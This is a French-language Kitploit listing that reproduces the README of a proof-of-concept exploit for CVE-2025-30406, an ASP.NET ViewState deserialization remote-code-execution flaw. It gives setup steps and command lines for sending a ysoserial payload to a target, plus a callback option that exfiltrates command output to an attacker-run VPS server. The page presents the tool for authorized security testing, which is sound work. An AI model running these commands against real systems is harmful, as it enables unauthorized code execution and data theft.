Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-30406 — CVE-2025-30406 PoC d'exploitation de ViewState | Kitploit
Outils/GitHubGitHub/mchklt/cve-2025-30406
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubmchklt/cve-2025-30406

CVE-2025-30406

CVE-2025-30406 PoC d'exploitation de ViewState

Voir le dépôt
90184il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-30406 PoC d'exploitation ViewState

Vue d'ensemble

Il s'agit d'un script Proof-of-Concept (PoC) démontrant une exploitation de désérialisation ViewState pour CVE-2025-30406 dans les applications ASP.NET. Il utilise ysoserial pour générer une charge utile ViewState malveillante et l'envoie à une URL spécifiée par l'utilisateur afin d'exécuter une commande fournie. Pour de meilleurs résultats, la sortie de la commande peut être exfiltrée vers un serveur HTTP personnalisé (server.py) exécuté sur un VPS, qui affiche les résultats dans un format stylisé avec horodatages, invites vertes et texte de sortie blanc. Ce script est destiné uniquement à des fins éducatives et ne doit être utilisé que sur des systèmes pour lesquels vous disposez d'une autorisation explicite pour effectuer des tests de sécurité. Toute utilisation non autorisée est illégale et contraire à l'éthique.

Détails de la CVE

  • Identifiant CVE : CVE-2025-30406
  • Description : Une vulnérabilité de désérialisation dans la gestion ViewState d'ASP.NET qui permet l'exécution de code à distance lorsqu'une clé de validation et un générateur valides sont connus.
  • Systèmes affectés : Applications ASP.NET avec des configurations ViewState vulnérables.
  • Conditions préalables à l'exploitation :
    • Accès à une clé de validation ViewState et à un générateur valides.
    • Un point de terminaison vulnérable acceptant les paramètres ViewState.

Contenu du dépôt

Télécharger l’outil
  • exploit.py : Le script PoC principal pour générer et envoyer la charge utile ViewState.
  • server.py : Un serveur HTTP pour recevoir et afficher la sortie de commande exfiltrée dans un format stylisé.
  • README.md : Ce fichier, avec les instructions d'installation et d'utilisation.

Prérequis

  • Python 3.x
  • Bibliothèque requests (pip install requests)
  • Exécutable ysoserial (Windows ou équivalent pour votre plateforme)
  • Un point de terminaison d'application ASP.NET vulnérable
  • Un VPS ou un serveur pour exécuter server.py (recommandé pour l'exfiltration)
  • L'autorisation de tester le système cible

Installation

  1. Clonez ce dépôt :
    root@kitploit:~
    git clone https://github.com/yourusername/cve-2025-30406-poc.git
    cd cve-2025-30406-poc
    
  2. Installez le paquet Python requis :
    root@kitploit:~
    pip install requests
    
  3. Téléchargez ysoserial et placez-le dans le même répertoire que exploit.py ou spécifiez son chemin :
    • ysoserial GitHub

Configuration sur un VPS (Recommandé)

Pour recevoir la sortie de commande exfiltrée dans un format stylisé, exécutez server.py sur un VPS :

  1. Copiez server.py vers votre VPS (par exemple, via scp) :
    root@kitploit:~
    scp server.py user@your-vps-ip:/home/user/
    
  2. Assurez-vous que Python 3 est installé :
    root@kitploit:~
    sudo apt update && sudo apt install python3 python3-pip
    
  3. Lancez le serveur (port par défaut 8000) :
    root@kitploit:~
    python3 server.py
    
  4. Assurez-vous que le pare-feu du VPS autorise le trafic entrant sur le port 8000 :
    root@kitploit:~
    sudo ufw allow 8000
    
  5. Notez l'adresse IP publique ou le domaine du VPS (par exemple, http://your-vps-ip:8000) pour l'utiliser avec l'option -e dans exploit.py.

Utilisation

Exécution de l'exploit

Exécutez exploit.py avec les arguments requis. L'option -e est facultative mais fortement recommandée pour exfiltrer la sortie de commande vers server.py afin de l'afficher de manière stylisée.

root@kitploit:~
python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]

Arguments

  • -u, --url : URL cible (par exemple, http://target.com/page.aspx) [Obligatoire]
  • -c, --command : Commande à exécuter (par exemple, whoami) [Obligatoire]
  • -y, --ysoserial : Chemin vers l'exécutable ysoserial (par défaut : ./ysoserial.exe) [Facultatif]
  • -e, --exfil : URL de rappel pour exfiltrer la sortie de commande (par exemple, http://your-vps:8000) [Facultatif]

Exemples

  1. Exécution sans exfiltration (exécution aveugle) :
    root@kitploit:~
    python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
    
  2. Exécution avec exfiltration vers un VPS exécutant server.py (recommandé) :
    root@kitploit:~
    python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000
    

Exécution du serveur

Sur votre VPS ou votre machine locale, démarrez le serveur HTTP pour recevoir la sortie exfiltrée :

root@kitploit:~
python3 server.py

Le serveur affichera la sortie de commande avec des horodatages, une invite $ verte et du texte blanc pour une meilleure lisibilité.

Fonctionnement

  1. Script d'exploitation (exploit.py) :
    • Utilise ysoserial avec une clé de validation et un générateur codés en dur pour créer une charge utile ViewState.
    • Si -e est fourni, la commande est encapsulée pour capturer la sortie et l'envoyer à l'URL de rappel via Invoke-WebRequest.
    • Envoie la charge utile à l'URL cible dans une requête POST, intégrée dans le paramètre __VIEWSTATE.
    • Affiche le statut de la réponse du serveur et une partie du corps de la réponse.
  2. Serveur HTTP (server.py) :
    • Écoute les requêtes GET contenant la sortie de commande.
    • Décode le chemin de l'URL et le divise en lignes.
    • Affiche chaque ligne avec un horodatage, une invite $ verte et un texte de sortie blanc.
    • Répond avec HTTP 200 et « OK ».

Avertissement sur l'utilisation éthique

  • Ce script est une preuve de concept pour CVE-2025-30406 à des fins éducatives et de tests de sécurité autorisés.
  • N'utilisez pas ce script sur des systèmes sans l'autorisation explicite du propriétaire du système.
  • Une mauvaise utilisation peut violer les lois, notamment le Computer Fraud and Abuse Act (CFAA) aux États-Unis ou des lois similaires ailleurs.
  • Obtenez toujours un consentement écrit avant de tester un système.
  • Signalez les vulnérabilités de manière responsable via une divulgation coordonnée ou des programmes de bug bounty.

Limites

  • La clé de validation et le générateur codés en dur peuvent ne fonctionner que pour des applications vulnérables spécifiques. Les utilisateurs peuvent avoir besoin de valeurs spécifiques à l'application.
  • L'exploit cible les applications ASP.NET vulnérables à la désérialisation ViewState.
  • Le script suppose que le serveur cible traite correctement la charge utile ViewState.
  • La compatibilité multiplateforme dépend de la disponibilité de ysoserial (principalement basé sur Windows).
  • L'exfiltration nécessite un serveur accessible publiquement pour l'URL de rappel -e.

Licence

Ce projet est sous licence MIT. Voir le fichier LICENSE pour plus de détails.

Contact

Pour toute question ou retour, veuillez ouvrir une issue sur ce dépôt.